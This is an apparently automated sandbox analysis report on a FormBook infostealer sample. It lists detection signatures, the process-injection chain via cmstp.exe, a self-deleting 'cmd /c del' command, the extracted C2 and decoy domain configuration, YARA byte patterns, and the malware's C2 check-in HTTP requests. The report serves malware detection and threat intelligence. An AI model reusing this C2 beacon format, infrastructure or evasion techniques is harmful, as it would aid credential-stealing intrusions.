
Analysis Report LWlcpDjYIQ.exe

Overview

General Information

Sample Name: LWlcpDjYIQ.exe
Analysis ID: 383953
MD5: 91523f8d438585534d9466432cc4665d
SHA1: e34b69f0ded056eca7dd43b8f5be2edf7198c211
SHA256: b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • LWlcpDjYIQ.exe (PID: 5524 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
    • LWlcpDjYIQ.exe (PID: 3664 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5796 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6136 cmdline: /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV | Avira URL Cloud: Label: malware
Source: http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV | Avira URL Cloud: Label: malware
Source: http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV | Avira URL Cloud: Label: malware
Found malware configuration
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll | ReversingLabs: Detection: 24%
Multi AV Scanner detection for submitted file
Source: LWlcpDjYIQ.exe | ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: 7.2.cmstp.exe.45c708.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cmstp.exe.4b87960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: LWlcpDjYIQ.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL | source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: LWlcpDjYIQ.exe, cmstp.exe
Source: Binary string: cmstp.pdb | source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\LWlcpDjYIQ.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.simplyhealrhcareplans.com/sqra/
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1 | Host: www.karizcustomizeme.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.luxel01.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1 | Host: www.orchidandiris.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.anadelalastra.art | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.ecomcourse.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1 | Host: www.huongdandidong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.muzhskoy-eskort.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1 | Host: www.simplyhealrhcareplans.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1 | Host: www.socialunified.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.lewishackney.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1 | Host: www.shopthen2.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1 | Host: www.karizcustomizeme.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153 199.59.242.153
Source: Joe Sandbox View | IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View | ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: C:\Windows\explorer.exe | Code function: 5_2_06416302 getaddrinfo,setsockopt,recv,
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1 | Host: www.karizcustomizeme.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.luxel01.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1 | Host: www.orchidandiris.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.anadelalastra.art | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.ecomcourse.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1 | Host: www.huongdandidong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.muzhskoy-eskort.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1 | Host: www.simplyhealrhcareplans.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1 | Host: www.socialunified.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1 | Host: www.lewishackney.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1 | Host: www.shopthen2.site | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1 | Host: www.karizcustomizeme.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.karizcustomizeme.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.13.4Date: Thu, 08 Apr 2021 11:02:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 285Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>
Source: explorer.exe, 00000005.00000000.240958021.000000000F709000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
